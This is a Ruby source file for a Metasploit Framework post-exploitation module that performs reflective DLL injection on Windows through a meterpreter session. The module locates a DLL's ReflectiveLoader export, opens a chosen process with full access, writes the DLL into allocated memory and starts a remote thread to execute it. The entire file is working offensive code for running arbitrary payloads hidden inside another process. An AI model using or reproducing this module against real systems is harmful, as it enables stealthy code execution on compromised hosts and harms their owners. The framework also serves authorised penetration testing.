## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' class Metasploit3 < Msf::Post include Msf::Post::Common def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage Reflective DLL Injection Module', 'Description' => %q{ This module will inject into the memory of a process a specified Reflective DLL. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell '], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] )) register_options( [ OptPath.new('PATH',[true, 'Reflective DLL to inject into memory of a process.']), OptInt.new('PID',[true, 'Process Identifier to inject of process to inject payload.']), ], self.class) end # Run Method for when run command is issued def run # syinfo is only on meterpreter sessions print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? dll = '' offset = nil begin File.open( datastore['PATH'], "rb" ) { |f| dll += f.read(f.stat.size) } pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) pe.exports.entries.each do |entry| if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) offset = pe.rva_to_file_offset( entry.rva ) break end end raise "Can't find an exported ReflectiveLoader function!" if offset.nil? or offset == 0 rescue print_error( "Failed to read and parse Dll file: #{$!}" ) return end inject_into_pid(dll, datastore['PID'], offset) end def inject_into_pid(pay, pid, offset) if offset.nil? or offset == 0 print_error("Reflective Loader offset is nil.") return end if pay.nil? or pay.empty? print_error("Invalid DLL.") return end if pid.nil? or not has_pid?(pid) print_error("Invalid PID.") return end print_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}") begin print_status("Opening process #{pid}") host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) print_status("Allocating memory in procees #{pid}") mem = host_process.memory.allocate(pay.length + (pay.length % 1024)) # Ensure memory is set for execution host_process.memory.protect(mem) vprint_status("Allocated memory at address #{"0x%.8x" % mem}, for #{pay.length} bytes") print_status("Writing the payload into memory") host_process.memory.write(mem, pay) print_status("Executing payload") host_process.thread.create(mem+offset, 0) print_good("Successfully injected payload in to process: #{pid}") rescue ::Exception => e print_error("Failed to Inject Payload to #{pid}!") vprint_error(e.to_s) end end end